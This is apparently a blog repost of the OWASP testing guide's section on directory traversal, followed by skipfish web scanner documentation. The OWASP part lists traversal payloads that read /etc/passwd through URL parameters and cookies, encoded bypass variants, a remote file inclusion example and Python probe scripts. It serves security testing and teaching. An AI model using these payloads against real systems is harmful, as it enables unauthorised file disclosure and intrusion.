2010.06.01 15:01

Testing for Directory Traversal

Black Box testing and example

(a) Input Vectors Enumeration
In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. This includes HTTP GET and POST queries and common options like file uploads and HTML forms.

Here are some examples of the checks to be performed at this stage (a short enumeration sketch follows the examples):

  • Are there request parameters which could be used for file-related operations?
  • Are there unusual file extensions?
  • Are there interesting variable names?
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
  • Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
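
These checks lend themselves to simple automation. Below is a minimal sketch in Python; the parameter names and file suffixes are illustrative assumptions, not an exhaustive list.

# Sketch: flag request parameters whose names or values hint at
# file-related operations, per the checklist above.
from urllib.parse import urlparse, parse_qsl

SUSPICIOUS_NAMES = {"file", "item", "home", "page", "template", "doc", "path"}
SUSPICIOUS_SUFFIXES = (".html", ".htm", ".txt", ".cfg", ".inc")

def flag_input_vectors(url):
    """Return (param, value, reason) tuples worth testing for traversal."""
    findings = []
    for name, value in parse_qsl(urlparse(url).query):
        if name.lower() in SUSPICIOUS_NAMES:
            findings.append((name, value, "file-related parameter name"))
        if value.lower().endswith(SUSPICIOUS_SUFFIXES):
            findings.append((name, value, "file-like parameter value"))
    return findings

for u in ("http://example.com/getUserProfile.jsp?item=ikki.html",
          "http://example.com/index.php?file=content",
          "http://example.com/main.cgi?home=index.htm"):
    print(u, flag_input_vectors(u))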


(b) Testing Techniques

The next stage of testing is analyzing the input validation functions present in the web application.

Using the previous example, the dynamic page getUserProfile.jsp loads static information from a file and shows the content to users. An attacker could insert the malicious string "../../../../etc/passwd" to include the password file of a Linux/Unix system. Obviously, this kind of attack is possible only if the validation checkpoint fails; given the filesystem permissions, the web application process itself must be able to read the file.

To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. There is no point requesting /etc/passwd from an IIS web server.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

For the cookies example, we have:

Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd

It's also possible to include files and scripts located on an external website.

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

The following example demonstrates how it is possible to show the source code of a CGI component without using any path traversal characters.

http://example.com/main.cgi?home=main.cgi

The component called "main.cgi" is located in the same directory as the normal static HTML files used by the application. In some cases the tester needs to encode the requests using special characters (like the "." dot or the "%00" null byte) in order to bypass file extension controls or to prevent script execution.
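
The probes above can be automated at this stage. The following is a minimal sketch, assuming Python with the third-party requests library; the example.com endpoints and cookie names are the placeholders from the examples above, and "root:" is used as a crude indicator that /etc/passwd was disclosed. (The cookie examples show colon-separated pairs in a single header; a cookie dict is a reasonable approximation.)

# Sketch: send the traversal probes from the examples above and look for
# a telltale string in the response. Requires the "requests" package.
import requests

TARGET = "http://example.com"

probes = [
    ("query parameter traversal",
     TARGET + "/getUserProfile.jsp?item=../../../../etc/passwd", {}),
    ("cookie-based traversal",
     TARGET + "/getUserProfile.jsp",
     {"USER": "1826cc8f", "PSTYLE": "../../../../etc/passwd"}),
    ("remote file inclusion",
     TARGET + "/index.php?file=http://www.owasp.org/malicioustxt", {}),
    ("source code disclosure",
     TARGET + "/main.cgi?home=main.cgi", {}),
]

for description, url, cookies in probes:
    resp = requests.get(url, cookies=cookies, timeout=10)
    hit = "root:" in resp.text  # crude /etc/passwd indicator
    print("%s: HTTP %d, suspicious=%s" % (description, resp.status_code, hit))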

Tip: It's a common mistake for developers not to expect every form of encoding, and therefore to validate only basic encoded content. If your test string isn't successful at first, try another encoding scheme.

Each operating system uses different characters as path separators:

Unix-like OS:

root directory: "/" 
directory separator: "/" 

Windows OS shell:

root directory: "<drive letter>:\"
directory separator: "\" or "/"

The following elements are effectively ignored in a path, so each of the examples below can resolve to the same file.txt:

  • greater-than and less-than signs ">" and "<"
  • double quotes (closed properly)
  • extraneous current directory markers such as "./" or ".\"
  • extraneous parent directory markers with arbitrary items that may or may not exist

Examples:

  • file.txt
  • file.txt...
  • file.txt<spaces>
  • file.txt""""
  • file.txt<<<>><><
  • file.txt/./././
  • nonexistant/../file.txt
The MAX_PATH limit on a filename can be exceeded by prefixing the path with "\\?\", but the path must then be absolute: no parent or current directory indicators such as "./" or "../" can be used.

"Windows API"

The following items are discarded:
periods
spaces

"Windows UNC Filenames"

Used to reference files on an SMB share. Sometimes an application can be made to refer to files on a remote UNC path. If so, the Windows host may send stored credentials to the attacker's SMB server, where they can be captured and cracked.

\\server_or_ip\path\to\file.abc
\\?\server_or_ip\path\to\file.abc

"Windows NT Device Namespace"

Used to refer to the Windows device namespace
\\.\GLOBALROOT\Device\HarddiskVolume1\   -equivalent to c:\
\\\airpcap00\ \\.\airpcap00\
\\.\CdRom0\

Usually, on Windows, a directory traversal attack is limited to a single partition.

"DOS Special Devices"

\
CON - thee console 
PRN -  a parallel printer 
COM1 - the first serial port 
NUL -  bit bucket (/dev/null equivalent) 

Extensions are ignored. Ex:
- COM.bat
-CON.<666x"A">

Classic Mac OS:

root directory: "<volume name>:"
directory separator: ":"


We should take into account the following character encodings (a payload-generator sketch follows the list):

  • URL encoding and double URL encoding
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
  • Unicode/UTF-8 Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)
..%c0%af represents ../
..%c1%9c represents ..\
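
Rather than hand-building each variant, the encodings above can be generated mechanically and substituted into a payload. A minimal sketch in Python; the traversal depth and target file are illustrative assumptions.

# Sketch: emit one candidate payload per encoding variant listed above.
DOT_DOT_VARIANTS = [
    "%2e%2e%2f",       # URL-encoded ../
    "%2e%2e/",         # partially encoded ../
    "..%2f",           # partially encoded ../
    "%2e%2e%5c",       # URL-encoded ..\
    "%2e%2e\\",        # partially encoded ..\
    "..%5c",           # partially encoded ..\
    "%252e%252e%255c", # double URL-encoded ..\
    "..%255c",         # double URL-encoded ..\
    "..%c0%af",        # overlong UTF-8 ../
    "..%c1%9c",        # overlong UTF-8 ..\
]

def build_payloads(target_file="etc/passwd", depth=4):
    """Yield one traversal payload per encoding variant."""
    for variant in DOT_DOT_VARIANTS:
        yield variant * depth + target_file

for payload in build_payloads():
    print(payload)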


Gray Box testing and example

When the analysis is performed with a Gray Box approach, we have to follow the same methodology as in Black Box Testing. However, since we can review the source code, it is possible to search the input vectors (stage (a) of the testing) more easily and accurately. During a source code review, we can use simple tools (such as the grep command) to search for one or more common patterns within the application code: inclusion functions/methods, filesystem operations, and so on.

PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ... 
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...

Using online code search engines (e.g., Google CodeSearch, Koders), it may also be possible to find path traversal flaws in open source software published on the Internet.

For PHP, we can use:

lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
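
The same pattern can be applied locally during a source review. Below is a minimal sketch in Python that walks a PHP source tree with the regular expression above; the directory layout is an assumption.

# Sketch: grep-like scan of *.php files for include/require calls that
# take their argument directly from $_GET, $_POST, or $_COOKIE.
import re
import sys
from pathlib import Path

PATTERN = re.compile(r"""(include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)""")

def scan(root):
    for path in Path(root).rglob("*.php"):
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if PATTERN.search(line):
                print("%s:%d: %s" % (path, lineno, line.strip()))

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")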


Using the Gray Box Testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even impossible to find during a standard Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored in a database. It may be possible to insert specially crafted path traversal strings when the application adds data to the database. This kind of security problem is difficult to discover because the parameters inside the inclusion functions seem internal and "safe", when in fact they are not.

Additionally, when reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to change invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws.

Consider a web application with these instructions:

filename = Request.QueryString("file");
Replace(filename, "/", "\");
Replace(filename, "..\", "");

Testing for the flaw is achieved with payloads such as the following (a short simulation follows the list):

file=....//....//boot.ini
file=....\\....\\boot.ini
file=..\..\boot.ini
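
To see why the doubled sequences work, the sanitizer above can be re-implemented and run against the payloads. A minimal Python sketch, assuming Replace() behaves like a single, non-recursive, left-to-right substitution pass.

# Sketch: reproduce the flawed sanitizer and show that stripping "..\"
# from "....\\" leaves "..\" behind, so the traversal survives.
def flawed_sanitize(filename):
    filename = filename.replace("/", "\\")   # Replace(filename, "/", "\")
    filename = filename.replace("..\\", "")  # Replace(filename, "..\", "")
    return filename

print(flawed_sanitize("....//....//boot.ini"))      # prints ..\..\boot.ini
print(flawed_sanitize("....\\\\....\\\\boot.ini"))  # prints ..\..\boot.ini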


Source: www.owasp.org


2010.03.30 11:12

skipfish - web application security scanner

A rough list of the security checks offered by the tool is outlined below.
  • High risk flaws (potentially leading to system compromise):

    • Server-side SQL injection (including blind vectors, numerical parameters).
    • Explicit SQL-like syntax in GET or POST parameters.
    • Server-side shell command injection (including blind vectors).
    • Server-side XML / XPath injection (including blind vectors).
    • Format string vulnerabilities.
    • Integer overflow vulnerabilities.
    • Locations accepting HTTP PUT.
  • Medium risk flaws (potentially leading to data compromise):

    • Stored and reflected XSS vectors in document body (minimal JS XSS support present).
    • Stored and reflected XSS vectors via HTTP redirects.
    • Stored and reflected XSS vectors via HTTP header splitting.
    • Directory traversal (including constrained vectors).
    • Assorted file POIs (server-side sources, configs, etc).
    • Attacker-supplied script and CSS inclusion vectors (stored and reflected).
    • External untrusted script and CSS inclusion vectors.
    • Mixed content problems on script and CSS resources (optional).
    • Incorrect or missing MIME types on renderables.
    • Generic MIME types on renderables.
    • Incorrect or missing charsets on renderables.
    • Conflicting MIME / charset info on renderables.
    • Bad caching directives on cookie setting responses.
  • Low risk issues (limited impact or low specificity):

    • Directory listing bypass vectors.
    • Redirection to attacker-supplied URLs (stored and reflected).
    • Attacker-supplied embedded content (stored and reflected).
    • External untrusted embedded content.
    • Mixed content on non-scriptable subresources (optional).
    • HTTP credentials in URLs.
    • Expired or not-yet-valid SSL certificates.
    • HTML forms with no XSRF protection.
    • Self-signed SSL certificates.
    • SSL certificate host name mismatches.
    • Bad caching directives on less sensitive content.
  • Internal warnings:

    • Failed resource fetch attempts.
    • Exceeded crawl limits.
    • Failed 404 behavior checks.
    • IPS filtering detected.
    • Unexpected response variations.
    • Seemingly misclassified crawl nodes.
  • Non-specific informational entries:

    • General SSL certificate information.
    • Significantly changing HTTP cookies.
    • Changing Server, Via, or X-... headers.
    • New 404 signatures.
    • Resources that cannot be accessed.
    • Resources requiring HTTP authentication.
    • Broken links.
    • Server errors.
    • All external links not classified otherwise (optional).
    • All external e-mails (optional).
    • All external URL redirectors (optional).
    • Links to unknown protocols.
    • Form fields that could not be autocompleted.
    • Password entry forms (for external brute-force).
    • File upload forms.
    • Other HTML forms (not classified otherwise).
    • Numerical file names (for external brute-force).
    • User-supplied links otherwise rendered on a page.
    • Incorrect or missing MIME type on less significant content.
    • Generic MIME type on less significant content.
    • Incorrect or missing charset on less significant content.
    • Conflicting MIME / charset information on less significant content.
    • OGNL-like parameter passing conventions.

Along with a list of identified issues, skipfish also provides summary overviews of document types and issue types found; and an interactive sitemap, with nodes discovered through brute-force denoted in a distinctive way.

How to run the scanner?

Once you have the dictionary selected, you can try:

$ ./skipfish -o output_dir http://www.example.com/some/starting/path.txt

Note that you can provide more than one starting URL if so desired; all of them will be crawled.

Some sites may require authentication; for simple HTTP credentials, you can try:

$ ./skipfish -A user:pass ...other parameters...

Alternatively, if the site relies on HTTP cookies instead, log in with your browser or a simple curl script, and then provide skipfish with a session cookie:

$ ./skipfish -C name=val ...other parameters...

Other session cookies may be passed the same way, one per -C option.

Certain URLs on the site may log out your session; you can combat this in two ways: by using the -N option, which causes the scanner to reject attempts to set or delete cookies; or with the -X parameter, which prevents matching URLs from being fetched:

$ ./skipfish -X /logout/logout.aspx ...other parameters...

The -X option is also useful for speeding up your scans by excluding /icons/, /doc/, /manuals/, and other standard, mundane locations along these lines. In general, you can use -X, plus -I (only spider URLs matching a substring) and -S (ignore links on pages where a substring appears in response body) to limit the scope of a scan any way you like - including restricting it only to a specific protocol and port:

$ ./skipfish -I http://example.com:1234/ ...other parameters...

Another useful scoping option is -D - allowing you to specify additional hosts or domains to consider in-scope for the test. By default, all hosts appearing in the command-line URLs are added to the list - but you can use -D to broaden these rules, for example:

$ ./skipfish -D test2.example.com -o output-dir http://test1.example.com/

...or, for a domain wildcard match, use:

$ ./skipfish -D .example.com -o output-dir http://test1.example.com/

In some cases, you do not want to actually crawl a third-party domain, but you trust the owner of that domain enough not to worry about cross-domain content inclusion from that location. To suppress warnings, you can use the -B option, for example:

$ ./skipfish -B .google-analytics.com -B .googleapis.com ...other parameters...

By default, skipfish sends minimalistic HTTP headers to reduce the amount of data exchanged over the wire; some sites examine User-Agent strings or header ordering to reject unsupported clients, however. In such a case, you can use -b ie or -b ffox to mimic one of the two popular browsers.

But seriously, how to run it?

A standard, authenticated scan of a well-designed and self-contained site (warns about all external links, e-mails, mixed content, and caching header issues):

$ ./skipfish -MEU -C "AuthCookie=value" -X /logout.aspx -o output_dir http://www.example.com/

Five-connection crawl, but no brute-force; pretending to be MSIE and caring less about ambiguous MIME or character set mismatches:

$ ./skipfish -m 5 -LVJ -W /dev/null -o output_dir -b ie http://www.example.com/

Brute force only (no HTML link extraction), trusting links within example.com and timing out after 5 seconds:

$ ./skipfish -B .example.com -O -o output_dir -t 5 http://www.example.com/

For a short list of all command-line options, try ./skipfish -h.

Oy! Something went horribly wrong!

There is no web crawler so good that there wouldn't be a web framework to one day set it on fire. If you encounter what appears to be bad behavior (e.g., a scan that takes forever and generates too many requests, completely bogus nodes in scan output, or outright crashes), please first check our known issues page. If you can't find a satisfactory answer there, recompile the scanner with:

$ make clean debug

...and re-run it this way:

$ ./skipfish [...previous options...] 2>logfile.txt

You can then inspect logfile.txt to get an idea what went wrong; if it looks like a scanner problem, please scrub any sensitive information from the log file and send it to the author.

If the scanner crashed, please recompile it as indicated above, and then type:

$ ulimit -c unlimited 
$ ./skipfish [...previous options...] 2>logfile.txt 
$ gdb --batch -ex back ./skipfish core

...and be sure to send the author the output of that last command as well.


Original: http://code.google.com/p/skipfish/

